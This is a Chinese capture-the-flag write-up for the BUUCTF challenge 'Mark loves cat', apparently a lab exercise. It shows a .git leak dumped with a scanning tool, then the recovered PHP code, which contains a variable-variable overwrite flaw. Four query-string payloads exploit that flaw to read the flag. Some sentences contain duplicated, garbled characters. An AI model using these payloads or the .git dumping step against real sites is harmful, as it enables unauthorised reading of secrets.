BUUCTF WEB [BJDCTF2020]Mark loves cat
时间:2023-05-18 00:37:00
BUUCTF WEB [BJDCTF2020]Mark loves cat
-
源代码中没有发现漏洞,使用dirsearch扫描,发现.gti泄露
-
使用scrabble
./scrabble http://70f9aaf8-036c-44f0-b1f1-df263f120cfa.node4.buuoj.cn:81/ -
得到flag.php和index.php文件
flag.php
$flag = file_get_contents('/flag');index.php
Home WelcomeI Am Mark Stev
Web Developer , web designer
My Skill
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!
Photoshop
Illustrator
Html
Css
Education & Experience
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!
MERIN LAND COLLEGE
2012 - 2014Lorem ipsum dolor sit amet, consectetur adipisicing elit. Vitae, consectetur.
MERIN LAND COLLEGE
2012 - 2014Lorem ipsum dolor sit amet, consectetur adipisicing elit. Vitae, consectetur.
MERIN LAND COLLEGE
2012 - 2014Lorem ipsum dolor sit amet, consectetur adipisicing elit. Vitae, consectetur.
MERIN LAND COLLEGE
2012 - 2014Lorem ipsum dolor sit amet, consectetur adipisicing elit. Vitae, consectetur.
MERIN LAND COLLEGE
2012 - 2014Lorem ipsum dolor sit amet, consectetur adipisicing elit. Vitae, consectetur.
MERIN LAND COLLEGE
2012 - 2014Lorem ipsum dolor sit amet, consectetur adipisicing elit. Vitae, consectetur.
My Daily Service
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!
Design
Lorem ipsum dolor sit amet, consectetur adipisicing elit. At, nisi?
DEVELOPMENT
Lorem ipsum dolor sit amet, consectetur adipisicing elit. At, nisi?
BRANDING
Lorem ipsum dolor sit amet, consectetur adipisicing elit. At, nisi?
MARKETING
Lorem ipsum dolor sit amet, consectetur adipisicing elit. At, nisi?
SUPPORT
Lorem ipsum dolor sit amet, consectetur adipisicing elit. At, nisi?
CONSULTING
Lorem ipsum dolor sit amet, consectetur adipisicing elit. At, nisi?
My Team Members
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!
Jhon Doue
Web Designer
Jhon Doue
Web Designer
Jhon Doue
Web Designer
Jhon Doue
Web Designer-
2350
Project Done
-
2350
Happy Clients
-
2350
Cups Of Coffee
-
2350
Photos Taken
My Clients Says
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent bibendum dolor sit amet eros imperdiet, sit amet hendrerit nisi vehicula.
Sara smith
Seo ExpertLorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent bibendum dolor sit amet eros imperdiet, sit amet hendrerit nisi vehicula.
williamson
Web DesignerLorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent bibendum dolor sit amet eros imperdiet, sit amet hendrerit nisi vehicula.
Kristina
Web DeveloperMy Blog
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!
STANdard POST WITH IMAGE
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Labore, excepturi modi eius a vel accusamus!
Read More
STANdard POST WITH IMAGE
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Labore, excepturi modi eius a vel accusamus!
Read More
STANdard POST WITH IMAGE
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Labore, excepturi modi eius a vel accusamus!
Read MoreContact Me
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!
Email
contact@mark.com
Location
3481 Melrose Place, Los Angeles
Phone
+ 000-111-222
$y){ $$x = $y; } foreach($_GET as $x => $y){ $$x = $$y; } foreach($_GET as $x => $y){ if($_GET['flag'] === $x && $x !== 'flag'){ exit($handsome); } } if(!isset($_GET['flag']) && !isset($_POST['flag'])){ exit($yds); } if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ exit($is); } echo "the flag is: ".$flag; -
-
index.php中主要的php代码
include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($_GET as $x => $y){ $$x = $$y; } foreach($_GET as $x => $y){ if($_GET['flag'] === $x && $x !== 'flag'){ exit($handsome); } } if(!isset($_GET['flag']) && !isset($_POST['flag'])){ exit($yds); } if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ exit($is); } echo "the flag is: ".$flag; -
解法1
?handsome=flag&flag=foo&foo=flag利用GET方式传参
foreach($_GET as $x => $y){ $$x = $$y; }修改后
$handsome=$flag; $flag=$foo; $foo=$flag;在这个循环中
foreach($_GET as $x => $y){ if($_GET['flag'] === $x && $x !== 'flag'){ exit($handsome); } }当判断到
foo=flag时进入if,然后利用exit输出flag -
解法2
/?yds=flag利用GET方式传参
foreach($_GET as $x => $y){ $$x = $$y; }在这个foreach循环中覆盖 y d s 变 量 , 让 它 的 值 为 f l a g . p h p 中 的 yds变量,让它的值为flag.php中的 yds变量,让它的值为flag.php中的flag变量的值,然后利用
if(!isset($_GET['flag']) && !isset($_POST['flag'])){ exit($yds); }输出flag
-
解法3
?is=flag&flag=flag利用GET方式传参
foreach($_GET as $x => $y){ $$x = $$y; }覆盖 i s 变 量 , 同 时 不 改 变 is变量,同时不改变 is变量,同时不改变flag变量(若使用POST方式传flag=flag会改变$flag变量的值),然后利用
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ exit($is); }输出flag
-
解法4
?1=flag&flag=1绕过前面的三个if,使用最后的echo输出flag
注意:
foreach($_GET as $x => $y){ if($_GET['flag'] === $x && $x !== 'flag'){ exit($handsome); } }这个循环使用了强类型比较, G E T [ ′ f l a g ′ ] 得 到 的 1 是 S t r i n g , _GET['flag']得到的1是String, GET[′flag′]得到的1是String,x得到的1是int,从而绕过过滤。
